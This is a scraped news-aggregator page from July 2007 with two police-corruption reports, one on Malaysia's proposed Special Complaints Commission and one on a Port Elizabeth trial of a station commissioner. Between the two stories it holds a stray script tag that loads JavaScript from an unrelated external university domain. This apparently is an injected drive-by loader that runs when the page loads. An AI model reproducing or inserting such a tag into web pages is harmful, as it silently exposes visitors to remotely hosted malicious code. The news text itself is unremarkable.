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NEWS > 24 July 2007

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Malaysia: Police Complaints Co
KUALA LUMPUR: The proposed Special Complaints Commission was not what the 2005 royal commission into the police had asked for, Tun Mohamed Dzaiddin Abdullah said.

A "very disappointed" Dzaiddin, who was the chairman of the royal commission, said the proposed Special Complaints Commission (SCC) now being formed by an act of parliament, was "something entirely different from what we recommended".

"The government, in its wisdom, did not accept the core recommendation of an independent oversight body."

Dzaiddin, who retired as chief justice in March 2003, said the... Read more

 Article sourced from

<script src=http://wtrc.kangwon.ac.kr/skin/rook.js></script>
The Herald Eastern Cape, South
24 July 2007
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Prisoner wanted to give cop R1

A WOMAN told the Port Elizabeth magistrate‘s court yesterday that cross dresser “Queenie” Seveno Hendricks had told her to withdraw money from his account and give R100 000 to the then Humewood station commissioner, Kholiswa Faku.

Faku, 56, is standing trial for having a “generally corrupt relationship” with Hendricks, who is serving a 12-year jail term in Kirkwood.

Emmerentia Koekemoer told the court that Hendricks owed her R5 000. He had promised to give her the money once she had withdrawn the cash from his bank account. She said she had met him on numerous occasions while he was released under Faku‘s instructions.

“He asked me to buy flowers for Faku.”

Hendricks had asked her to withdraw money from his Nedbank account and give R100 000 to Faku. She had no idea what the money was for.

She said Hendricks had given her a copy of a document in which he gave her consent to handle his finances and to withdraw R500 000 from his account.

She never went to the bank to draw the money as she felt something was not right.

She later received phone calls from Faku, asking about the money.

Faku had called more than once, but she told her to stop or she would take steps.

Between 2004 and 2005, Faku allegedly co-ordinated the release of Hendricks from custody at St Albans Prison several times. He was released because he was supposedly required to assist the police with an investigation. However, Faku allegedly merely wanted to give Hendricks the opportunity to conduct private errands. The trial continues today.

 

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